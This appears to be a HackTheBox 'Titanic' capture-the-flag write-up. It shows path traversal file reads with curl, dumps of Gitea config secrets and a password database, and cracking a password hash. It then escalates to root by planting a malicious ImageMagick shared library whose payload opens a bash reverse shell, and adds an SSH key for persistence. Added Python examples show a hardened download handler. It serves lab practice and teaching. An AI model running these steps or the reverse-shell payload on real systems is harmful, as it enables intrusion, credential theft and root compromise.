Hackthebox-Season7-Titanic Quick Notes [Easy]
- 2025-08-29 21:33:02
![Hackthebox-Season7-Titanic简记[Easy]](/0pic/pp_92.jpg)
Notes

The IP redirects to http://titanic.htb, so add it to /etc/hosts first.

Subdomain enumeration:
```text
$ wfuzz -c -u http://titanic.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.titanic.htb' --hl 9
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://titanic.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000019:   200        275 L    1278 W     13870 Ch    "dev"
```

`--hl 9` hides the 9-line default response, so only a vhost that answers differently shows up. Add dev.titanic.htb to /etc/hosts as well.
The main site is a booking service with a single feature: booking a trip (Book New, top right). The dev subdomain is a Gitea instance hosting two repositories: developer/docker-config and developer/flask-app.

Start with the main site. whatweb shows it is a Python application:
```text
$ whatweb http://titanic.htb/
http://titanic.htb/ [200 OK] Bootstrap[4.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/3.0.3 Python/3.10.12], IP[10.129.194.71], JQuery, Python[3.10.12], Script, Title[Titanic - Book Your Ship Trip], Werkzeug[3.0.3]
```

(This is the flask-app from the dev subdomain. I did not notice that the first time through, so I never audited the source.)
Clicking Book New and filling in the form downloads a JSON file. Wherever there is a file download, test for arbitrary file download. Capture the request in Burp:
```http
POST /book HTTP/1.1
Host: titanic.htb
Content-Length: 75
Cache-Control: max-age=0
Origin: http://titanic.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titanic.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

name=aaa&email=aaa%40123&phone=17371996889&date=2222-02-02&cabin=Deluxe
```

(The form values are arbitrary.) Forward the request:
```http
HTTP/1.1 302 FOUND
Date: Wed, 19 Feb 2025 08:46:42 GMT
Server: Werkzeug/3.0.3 Python/3.10.12
Content-Type: text/html; charset=utf-8
Content-Length: 303
Location: /download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json
Connection: close

<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json">/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json</a>. If not, click the link.
```

The server answers with a 302 to /download?ticket=xxxxx, where the ticket parameter is a filename. Test for arbitrary file download; it is a Linux host, so start with /etc/passwd:
```text
$ curl -s http://titanic.htb/download?ticket=/etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
developer:x:1000:1000:developer:/home/developer:/bin/bash
```

Two users with a login shell; the web application runs either as developer or as www-data. Try reading the flag in developer's home directory (a guess, but a cheap one):

```text
$ curl -s http://titanic.htb/download?ticket=/home/developer/user.txt
21ce83fbxxxxxxxxxxxxxxxxxxxx
```

The user flag is readable.
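Why `ticket=/etc/passwd` works, and what a fixed handler looks like, as an added example. This is not the code from developer/flask-app (which I never audited) and not the author's; it is a stand-alone reconstruction of the pattern. The tickets directory `/opt/app/tickets` and the `<uuid>.json` naming are assumptions taken from the shape of the Location header above.

```python
"""Added example: naive vs. hardened resolution of the `ticket` parameter.

Not the Titanic flask-app's code. TICKETS_DIR and the filename pattern are
assumptions; a Flask route would pass the returned path to send_file().
"""
import os
import re
from typing import Optional

TICKETS_DIR = "/opt/app/tickets"  # assumed location of the generated ticket files

# Tickets handed out by /book look like <uuid4>.json (see the 302 Location header)
TICKET_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.json$")


def vulnerable_resolve(ticket: str) -> str:
    """What a naive handler does before send_file().

    os.path.join drops every component before an absolute one, so
    ticket="/etc/passwd" becomes exactly "/etc/passwd". A chain of "../"
    walks out of TICKETS_DIR just as well.
    """
    return os.path.join(TICKETS_DIR, ticket)


def is_valid_ticket(ticket: str) -> bool:
    """Allow-list on shape plus a basename check: no slashes, no traversal."""
    return bool(TICKET_RE.fullmatch(ticket)) and os.path.basename(ticket) == ticket


def hardened_resolve(ticket: str) -> Optional[str]:
    """Return the on-disk path for a ticket, or None if it must be refused.

    Independent layers: strict filename allow-list, basename check, and a
    realpath containment check so a symlink inside TICKETS_DIR cannot
    point the download outside it either.
    """
    if not is_valid_ticket(ticket):
        return None
    base = os.path.realpath(TICKETS_DIR)
    candidate = os.path.realpath(os.path.join(base, ticket))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("17e38735-baf1-43f9-931f-6a1ea16a1503.json", "/etc/passwd", "../../etc/passwd"):
        print(f"{name!r:45} naive={vulnerable_resolve(name)!r:30} hardened={hardened_resolve(name)!r}")
```

The realpath check alone would already block both payloads shown on this page; the allow-list is there so the endpoint cannot be pointed at anything but files the application itself created, which is the right shape for a download-by-id endpoint.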
Gitea on the dev subdomain is version 1.22.1; I found no public exploit for it. So keep working the arbitrary file read to widen the impact.

Look at the hosted code: repositories like this often describe internal services. The commit history holds nothing useful, but developer/docker-config contains docker-compose files for two services.
```yaml
version: '3'

services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22"  # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data # Replace with your path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
```

This is the compose file for the Gitea service. The line worth noticing is the volume mount `/home/developer/gitea/data:/data`: the container's data directory is backed by /home/developer/gitea/data on the host, which is exactly where our file read already works.
A search for "gitea data directory" leads to the Gitea docs, which describe it as:

> data/ - Data directory (APP_DATA_PATH), excluding sessions if you are using file sessions. This directory includes attachments, avatars, lfs, indexers, and the SQLite file if you are using SQLite.
```yaml
version: '3.8'

services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: sql_password
    restart: always
```

This is the MySQL compose file. It contains a password, MySQLP@$$w0rd!; note it for later.
The Gitea configuration docs (Configuration Cheat Sheet | Gitea Documentation) place app.ini at conf/app.ini under the custom directory; in the official Docker image that is /data/gitea/conf/app.ini. Combined with the volume mount

```yaml
volumes:
  - /home/developer/gitea/data:/data
```

the host-side path should be /home/developer/gitea/data/gitea/conf/app.ini. Try it:
```ini
$ curl -s http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
RUN_USER = git
WORK_PATH = /data/gitea

[repository]
ROOT = /data/git/repositories

[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo

[repository.upload]
TEMP_PATH = /data/gitea/uploads

[server]
APP_DATA_PATH = /data/gitea
DOMAIN = gitea.titanic.htb
SSH_DOMAIN = gitea.titanic.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.titanic.htb/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4
OFFLINE_MODE = true

[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable

[indexer]
ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve

[session]
PROVIDER_CONFIG = /data/gitea/sessions
PROVIDER = file

[picture]
AVATAR_UPLOAD_PATH = /data/gitea/avatars
REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars

[attachment]
PATH = /data/gitea/attachments

[log]
MODE = console
LEVEL = info
ROOT_PATH = /data/gitea/log

[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8
PASSWORD_HASH_ALGO = pbkdf2

[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost

[lfs]
PATH = /data/git/lfs

[mailer]
ENABLED = false

[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true

[cron.update_checker]
ENABLED = false

[repository.pull-request]
DEFAULT_MERGE_STYLE = merge

[repository.signing]
DEFAULT_TRUST_MODEL = committer

[oauth2]
JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g
```

The config gives the SQLite database path (PATH = /data/gitea/gitea.db), which maps to /home/developer/gitea/data/gitea/gitea.db on the host. It also exposes INTERNAL_TOKEN, LFS_JWT_SECRET and the oauth2 JWT_SECRET, so app.ini has to be treated as a credential store in its own right. Download the database:
```text
$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db --output gitea.db
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 2036k  100 2036k    0     0  1878k      0  0:00:01  0:00:01 --:--:-- 1879k
```

Downloaded. Inspect the database with a GUI such as sqlitebrowser or with the command-line client:
```text
$ sqlite3 gitea.db
sqlite> .tables
<SNIP>
user
<SNIP>
```

The user table is the interesting one. Check its schema first, then pull username, password hash, hash algorithm and salt:

```text
sqlite> .schema user
sqlite> select name,passwd,passwd_hash_algo,salt from user;
administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b
developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34
```

`pbkdf2$50000$50` is PBKDF2-HMAC-SHA256 with 50000 iterations and a 50-byte derived key (hence the 100 hex characters). Searching "gitea password cracker" turns up several ready-made projects on GitHub:
dvdknaap/gitea-crack-passwords: Crack GITEA passwords. From /etc/passwd we know developer is a local account, so crack developer's hash first:

```text
$ python3 1.py -s 8bf3e3452b78544f8bee9400d6936d34 -t e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 -w /usr/share/wordlists/rockyou.txt
<SNIP>
<SNIP>
Found password: 25282528
```

Alternatively, F4dee3/gitea2hashcat (a Bash script that extracts Gitea hashes in hashcat format) converts the database rows for hashcat:

```text
$ ./gitea2hashcat.sh
[+] Usage: ./gitea2hashcat.sh
    -d) Provide the database file (e.g., gitea.db)
    -o) Specify the output file
    -h) Display this help panel
$ ./gitea2hashcat.sh -d gitea.db -o gitea.hash
```

gitea.hash then contains:

```text
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
```

That is hashcat's PBKDF2-HMAC-SHA256 format (mode 10900), with a `user:` prefix, so crack it with:

```text
$ hashcat -m 10900 --username gitea.hash /usr/share/wordlists/rockyou.txt
```

Then SSH in right away; the password is 25282528.
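To see what both tools above are doing, here is an added example, written for this page and not taken from either project, that recomputes a Gitea `pbkdf2$iter$keylen` digest, checks a candidate password against it, and emits the hashcat 10900 line, using only the Python standard library. The only input is the developer row dumped from gitea.db above; the password check in `__main__` uses the value the wordlist attack reported.

```python
"""Added example: verify and convert Gitea pbkdf2 password records.

Not the page's or the linked tools' code. Gitea's `pbkdf2` algorithm is
PBKDF2-HMAC-SHA256; the algo string encodes iterations and key length.
"""
import base64
import hashlib
import hmac
from typing import Tuple

# developer row from the `user` table above: (passwd hex, passwd_hash_algo, salt hex)
DEVELOPER_ROW = (
    "e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56",
    "pbkdf2$50000$50",
    "8bf3e3452b78544f8bee9400d6936d34",
)


def parse_algo(algo: str) -> Tuple[int, int]:
    """'pbkdf2$50000$50' -> (iterations, derived key length in bytes)."""
    name, iters, keylen = algo.split("$")
    if name != "pbkdf2":
        raise ValueError(f"unsupported passwd_hash_algo {name!r}")
    return int(iters), int(keylen)


def gitea_pbkdf2(password: str, salt_hex: str, algo: str = "pbkdf2$50000$50") -> str:
    """Recompute the hex digest Gitea stores in user.passwd for the pbkdf2 algo."""
    iters, keylen = parse_algo(algo)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), iters, keylen)
    return dk.hex()


def check_password(password: str, passwd_hex: str, algo: str, salt_hex: str) -> bool:
    """Constant-time comparison of a candidate against the stored digest."""
    return hmac.compare_digest(gitea_pbkdf2(password, salt_hex, algo), passwd_hex)


def to_hashcat(username: str, passwd_hex: str, algo: str, salt_hex: str) -> str:
    """hashcat -m 10900 line with --username prefix: user:sha256:iter:b64(salt):b64(digest)."""
    iters, _ = parse_algo(algo)

    def b64(hex_str: str) -> str:
        return base64.b64encode(bytes.fromhex(hex_str)).decode()

    return f"{username}:sha256:{iters}:{b64(salt_hex)}:{b64(passwd_hex)}"


if __name__ == "__main__":
    passwd_hex, algo, salt_hex = DEVELOPER_ROW
    print(to_hashcat("developer", passwd_hex, algo, salt_hex))
    # Re-check the password the wordlist attack above reported for developer
    print("25282528 matches developer:", check_password("25282528", passwd_hex, algo, salt_hex))
```

The base64 conversion is the whole of what gitea2hashcat does per row; the verifier is useful when a cracker reports a hit and you want to confirm it before burning an SSH attempt, or when a box stores a different algo string (`argon2`, `scrypt`, `bcrypt`) that the `pbkdf2` branch here deliberately refuses.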
```text
ssh developer@titanic.htb
```

Login succeeds.

Now privilege escalation. `sudo -l` is the opener, and as usual it gives nothing usable.

/opt/scripts/ contains a shell script:
```bash
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
```

Asked an AI to summarise it: it empties metadata.log, then runs ImageMagick's identify on every JPG under the images directory and appends the extracted metadata to metadata.log. Note that it first cd's into the images directory, so magick runs with that directory as its working directory.

ImageMagick version:
```text
developer@titanic:/opt/scripts$ magick --version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)
```

Searching "ImageMagick 7.1.1-35 github poc", the first hit is a PoC: this build of magick also looks for shared libraries in its current working directory, so place one in the directory the script cd's into (/opt/app/static/assets/images/, which developer can write to):
```bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("id");
    exit(0);
}
EOF
```

Change the command inside system() to `cat /root/root.txt > /tmp/root.txt`. The script is run by root's cron every minute (see Beyond Root), so the library is loaded as root on the next run and the flag lands in /tmp.
Get a shell as well:

```bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("bash -c '/bin/bash -i >& /dev/tcp/ip/1234 0>&1'");
    exit(0);
}
EOF
```

(Replace `ip` with your listener address.) Listen with nc -lvnp 1234:
```text
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [Your-IP] from (UNKNOWN) [Machine] 38172
bash: cannot set terminal process group (6262): Inappropriate ioctl for device
bash: no job control in this shell
root@titanic:/opt/app/static/assets/images# id
id
uid=0(root) gid=0(root) groups=0(root)
```

Simple persistence: add a public key.

```bash
echo 'your public key' >> ~/.ssh/authorized_keys
```

After that SSH works without a password:

```text
ssh root@titanic.htb
root@titanic:~# id
uid=0(root) gid=0(root) groups=0(root)
```

Beyond Root

Cron jobs:
```text
root@titanic:~# crontab -l
* * * * * /opt/scripts/identify_images.sh && /root/cleanup.sh
*/10 * * * * /root/revert.sh
```

Back when I only had the developer shell, ifconfig showed a docker interface. With root now:
```text
root@titanic:~# docker ps
CONTAINER ID   IMAGE         COMMAND                  CREATED        STATUS        PORTS                                                 NAMES
069e7799bf90   gitea/gitea   "/usr/bin/entrypoint…"   6 months ago   Up 3 hours    127.0.0.1:3000->3000/tcp, 127.0.0.1:2222->22/tcp   gitea
```

From here you can step into the container and look around (`docker exec -it 069 bash`).